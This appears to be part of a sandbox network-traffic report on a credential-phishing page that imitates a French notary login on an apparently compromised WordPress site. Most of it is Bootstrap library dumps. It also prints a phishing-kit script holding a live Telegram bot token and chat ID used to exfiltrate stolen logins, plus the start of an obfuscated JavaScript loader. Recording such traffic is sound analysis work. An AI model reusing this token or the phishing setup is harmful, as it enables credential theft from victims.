                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                        Server: cloudflare
                        CF-RAY: 8bb84164fef56a5c-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-08-30 22:35:42 UTC421INData Raw: 37 62 66 66 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                        Data Ascii: 7bff/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
                        2024-08-30 22:35:42 UTC1369INData Raw: 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2e 6b 65 79
                        Data Ascii: query","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key
                        2024-08-30 22:35:42 UTC1369INData Raw: 2c 57 6e 2c 55 6e 2c 71 6e 2c 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 2e 6f 6e 65 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 6c 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 65 29 7d 2c 74 29 2c 74 68 69 73 7d 76 61 72 20 6c 3d 7b 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 3a 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 67 65 74 55 49 44 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 3b
                        Data Ascii: ,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUID:function(t){for(;
                        2024-08-30 22:35:42 UTC1369INData Raw: 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 6c 7d 28 65 29 2c 4b 6e 3d 28 6e 3d 22 61 6c 65 72 74 22 2c 61 3d 22 2e 22 2b 28 6f 3d 22 62 73 2e 61 6c 65 72 74 22 29 2c 63 3d 28 72 3d 65 29 2e 66 6e 5b 6e 5d 2c 75 3d 7b 43 4c 4f 53 45 3a 22 63 6c 6f 73 65 22 2b 61 2c 43 4c 4f 53 45 44 3a 22 63 6c 6f 73 65 64 22 2b 61 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 61 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 66 3d 22 61 6c 65 72 74 22 2c 64 3d 22 66 61 64 65 22 2c 67 3d 22 73 68 6f 77 22 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 69 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 63 6c 6f 73 65 3d 66 75 6e 63 74 69 6f 6e
                        Data Ascii: arguments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this._element=t}var t=i.prototype;return t.close=function
                        2024-08-30 22:35:42 UTC1369INData Raw: 65 77 20 5f 29 29 2c 72 2e 66 6e 5b 6e 5d 3d 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 72 2e 66 6e 5b 6e 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 5f 2c 72 2e 66 6e 5b 6e 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 66 6e 5b 6e 5d 3d 63 2c 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 5f 29 2c 4d 6e 3d 28 70 3d 22 62 75 74 74 6f 6e 22 2c 79 3d 22 2e 22 2b 28 76 3d 22 62 73 2e 62 75 74 74 6f 6e 22 29 2c 45 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 3d 28 6d 3d 65 29 2e 66 6e 5b 70 5d 2c 54 3d 22 61 63 74 69 76 65 22 2c 62 3d 22 62 74 6e 22 2c 49 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 5e 3d 22 62 75 74 74 6f 6e 22 5d 27 2c 41 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22
                        Data Ascii: ew _)),r.fn[n]=_._jQueryInterface,r.fn[n].Constructor=_,r.fn[n].noConflict=function(){return r.fn[n]=c,_._jQueryInterface},_),Mn=(p="button",y="."+(v="bs.button"),E=".data-api",C=(m=e).fn[p],T="active",b="btn",I='[data-toggle^="button"]',A='[data-toggle="
                        2024-08-30 22:35:42 UTC1369INData Raw: 74 28 29 3b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 3b 6d 28 65 29 2e 68 61 73 43 6c 61 73 73 28 62 29 7c 7c 28 65 3d 6d 28 65 29 2e 63 6c 6f 73 65 73 74 28 4e 29 29 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 6d 28 65 29 2c 22 74 6f 67 67 6c 65 22 29 7d 29 2e 6f 6e 28 4f 2e 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 2c 49 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6d 28 74 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 4e 29 5b 30 5d 3b 6d 28 65 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 53 2c 2f 5e 66 6f 63 75 73 28 69 6e 29 3f 24 2f 2e 74 65 73 74 28 74 2e 74 79 70 65 29 29 7d 29 2c 6d 2e 66 6e 5b 70 5d 3d 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 6d 2e 66 6e 5b 70 5d 2e 43
                        Data Ascii: t();var e=t.target;m(e).hasClass(b)||(e=m(e).closest(N)),k._jQueryInterface.call(m(e),"toggle")}).on(O.FOCUS_BLUR_DATA_API,I,function(t){var e=m(t.target).closest(N)[0];m(e).toggleClass(S,/^focus(in)?$/.test(t.type))}),m.fn[p]=k._jQueryInterface,m.fn[p].C
                        2024-08-30 22:35:42 UTC1369INData Raw: 53 65 6c 65 63 74 6f 72 28 6e 74 29 2c 74 68 69 73 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 7d 76 61 72 20 74 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 71 29 7d 2c 74 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 22 68 69 64 64 65 6e 22 21 3d 3d 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74 79 22 29 26 26 74 68 69 73 2e 6e 65 78 74 28 29 7d 2c
                        Data Ascii: Selector(nt),this._addEventListeners()}var t=o.prototype;return t.next=function(){this._isSliding||this._slide(q)},t.nextWhenVisible=function(){!document.hidden&&P(this._element).is(":visible")&&"hidden"!==P(this._element).css("visibility")&&this.next()},
                        2024-08-30 22:35:42 UTC1369INData Raw: 6e 20 74 3d 6c 28 7b 7d 2c 57 2c 74 29 2c 46 6e 2e 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 6a 2c 74 2c 55 29 2c 74 7d 2c 74 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 28 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4d 4f 55 53 45 45 4e 54 45 52 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72
                        Data Ascii: n t=l({},W,t),Fn.typeCheckConfig(j,t,U),t},t._addEventListeners=function(){var e=this;this._config.keyboard&&P(this._element).on(Q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&(P(this._element).on(Q.MOUSEENTER,function(t){retur
                        2024-08-30 22:35:42 UTC1369INData Raw: 69 66 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 29 7b 76 61 72 20 65 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 24 29 29 3b 50 28 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 56 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 5b 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 29 5d 3b 6e 26 26 50 28 6e 29 2e 61 64 64 43 6c 61 73 73 28 56 29 7d 7d 2c 74 2e 5f 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 6f 3d 74 68 69 73 2c 73 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75
                        Data Ascii: if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll($));P(e).removeClass(V);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&P(n).addClass(V)}},t._slide=function(t,e){var n,i,r,o=this,s=this._element.qu
                        2024-08-30 22:35:42 UTC1369INData Raw: 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 74 5b 6e 5d 28 29 7d 65 6c 73 65 20 65 2e 69 6e 74 65 72 76 61 6c 26 26 28 74 2e 70 61 75 73 65 28 29 2c 74 2e 63 79 63 6c 65 28 29 29 7d 29 7d 2c 6f 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 69 66 28 65 29 7b 76 61 72 20 6e 3d 50 28 65 29 5b 30 5d 3b 69 66 28 6e 26 26 50 28 6e 29 2e 68 61 73 43 6c 61 73 73 28
                        Data Ascii: tring"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},o._dataApiClickHandler=function(t){var e=Fn.getSelectorFromElement(this);if(e){var n=P(e)[0];if(n&&P(n).hasClass(


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.44974388.212.10.204433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:42 UTC665OUTGET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/telegram.js HTTP/1.1
                        Host: www.askozvar.sk
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: script
                        Referer: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:42 UTC289INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:42 GMT
                        Server: Apache
                        Upgrade: h2
                        Connection: Upgrade, close
                        Last-Modified: Sun, 25 Aug 2024 16:54:06 GMT
                        ETag: "78-62084db394780"
                        Accept-Ranges: bytes
                        Content-Length: 120
                        Vary: Accept-Encoding
                        Content-Type: application/javascript
                        2024-08-30 22:35:42 UTC120INData Raw: 76 61 72 20 74 65 6c 65 67 72 61 6d 43 6f 6e 66 69 67 20 3d 20 7b 0d 0a 20 20 20 20 62 6f 74 54 6f 6b 65 6e 3a 20 27 37 34 37 36 32 39 34 37 30 31 3a 41 41 48 70 30 49 6d 69 73 63 5f 59 67 37 51 66 42 57 50 61 79 58 36 49 6b 69 55 74 42 59 79 7a 6e 74 51 27 2c 0d 0a 20 20 20 20 63 68 61 74 49 44 3a 20 27 2d 34 32 37 39 35 34 37 35 34 34 27 0d 0a 7d 3b 0d 0a
                        Data Ascii: var telegramConfig = { botToken: '7476294701:AAHp0Imisc_Yg7QfBWPayX6IkiUtBYyzntQ', chatID: '-4279547544'};


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.44974134.87.236.724433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:42 UTC533OUTGET /style/pdf_fr.js HTTP/1.1
                        Host: dancinggorillas.com
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: script
                        Referer: https://www.askozvar.sk/
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:42 UTC219INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:42 GMT
                        Server: Apache
                        Last-Modified: Sun, 05 Nov 2023 17:54:44 GMT
                        Accept-Ranges: bytes
                        Content-Length: 4988
                        Connection: close
                        Content-Type: application/javascript
                        2024-08-30 22:35:42 UTC4988INData Raw: 76 61 72 20 5f 30 78 65 65 38 61 33 36 3d 5f 30 78 32 65 31 38 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 61 35 32 33 66 2c 5f 30 78 34 31 65 35 65 65 29 7b 76 61 72 20 5f 30 78 35 33 39 63 39 32 3d 5f 30 78 32 65 31 38 2c 5f 30 78 35 62 30 30 36 35 3d 5f 30 78 33 61 35 32 33 66 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 31 36 39 39 36 65 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 33 39 63 39 32 28 30 78 31 63 30 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 33 39 63 39 32 28 30 78 31 63 37 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 33 39 63 39 32 28 30 78 31 63 62 29 29 2f 30 78 33 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 33 39 63 39 32 28 30 78 31 62 64 29 29 2f 30 78 34 2b 2d 70
                        Data Ascii: var _0xee8a36=_0x2e18;(function(_0x3a523f,_0x41e5ee){var _0x539c92=_0x2e18,_0x5b0065=_0x3a523f();while(!![]){try{var _0x16996e=parseInt(_0x539c92(0x1c0))/0x1*(parseInt(_0x539c92(0x1c7))/0x2)+parseInt(_0x539c92(0x1cb))/0x3+parseInt(_0x539c92(0x1bd))/0x4+-p


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.449751104.18.11.2074433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:43 UTC382OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                        Host: maxcdn.bootstrapcdn.com
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:43 UTC947INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:43 GMT
                        Content-Type: application/javascript; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        CDN-PullZone: 252412
                        CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                        CDN-RequestCountryCode: US
                        Access-Control-Allow-Origin: *
                        Cache-Control: public, max-age=31919000
                        ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                        Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                        CDN-ProxyVer: 1.04
                        CDN-RequestPullSuccess: True
                        CDN-RequestPullCode: 200
                        CDN-CachedAt: 01/15/2024 23:55:45
                        CDN-EdgeStorageId: 845
                        timing-allow-origin: *
                        cross-origin-resource-policy: cross-origin
                        X-Content-Type-Options: nosniff
                        CDN-Status: 200
                        CDN-RequestId: 1b67fa50f8ffc843a15d702643eb706f
                        CDN-Cache: HIT
                        CF-Cache-Status: HIT
                        Age: 14713363
                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                        Server: cloudflare
                        CF-RAY: 8bb8416b1a3a8c5d-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-08-30 22:35:43 UTC422INData Raw: 37 63 30 30 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                        Data Ascii: 7c00/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                        2024-08-30 22:35:43 UTC1369INData Raw: 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2e 6b 65 79 2c 69
                        Data Ascii: ery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i
                        2024-08-30 22:35:43 UTC1369INData Raw: 69 67 67 65 72 28 65 2e 65 6e 64 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45 6c 65 6d 65 6e 74 28 6f 29 3f 22 65 6c 65 6d 65 6e 74 22 3a
                        Data Ascii: igger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isElement(o)?"element":
                        2024-08-30 22:35:43 UTC1369INData Raw: 3b 72 65 74 75 72 6e 20 6f 28 74 29 2e 74 72 69 67 67 65 72 28 65 29 2c 65 7d 2c 65 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 29 7d 2c 65 2e 5f
                        Data Ascii: ;return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._destroyElement(t)},e._
                        2024-08-30 22:35:43 UTC1369INData Raw: 29 7d 69 66 28 74 29 7b 69 66 28 69 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61
